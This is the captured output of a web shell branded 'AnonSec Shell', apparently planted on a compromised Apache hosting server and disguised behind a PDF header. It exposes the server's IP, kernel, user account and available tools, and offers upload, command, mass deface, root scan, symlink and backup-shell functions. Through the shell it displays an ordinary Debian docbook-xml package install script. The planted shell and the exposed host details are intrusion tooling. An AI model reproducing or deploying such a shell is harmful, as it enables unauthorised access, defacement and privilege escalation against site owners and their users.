%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj < AnonSec Shell
AnonSec Shell
Server IP : 212.252.79.165  /  Your IP : 216.73.217.172   [ Reverse IP ]
Web Server : Apache
System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User : cehaburo ( 1001)
PHP Version : 8.1.33
Disable Function : exec,passthru,shell_exec,system
Domains : 48 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/docbook-xml.preinst
#!/bin/sh

set -e

rm_conffile() {
	CONFFILE="$1"
	
	if [ -e "$CONFFILE" ]; then
		md5sum="`md5sum \"$CONFFILE\" | sed -e \"s/ .*//\"`"
		old_md5sum="`dpkg-query -W -f='${Conffiles}' docbook-xml | grep $CONFFILE | awk '{print $2}'`"
		if [ "$md5sum" != "$old_md5sum" ]; then
			echo "Obsolete conffile $CONFFILE has been modified by you."
			echo "Saving as $CONFFILE.dpkg-bak ..."
			mv -f "$CONFFILE" "$CONFFILE".dpkg-bak
		else
			echo "Removing obsolete conffile $CONFFILE ..."
			rm -f "$CONFFILE"
		fi
	fi
}

# converting a directory to symlinks during package upgrade doesn't work,
# lets remove the junk in here by hand
# bug 143780, problems caused by danging symlinks
if [ "$1" = upgrade ]; then
    rm -r /usr/share/sgml/docbook/dtd/xml/[1-9]* || true
fi

# handle obsolete dbgenent.ent files, that are placed in /etc/sgml/docbook-xml
# fixes bug #426058
# 4.5: obsoletes 3.1.7
if [ "$1" = remove ] || [ "$1" = upgrade ]; then
	if dpkg --compare-versions "$2" lt "4.5"; then
		rm_conffile "/etc/sgml/docbook-xml/3.1.7/dbgenent.ent"
	fi
fi



Anon7 - 2022
AnonSec Team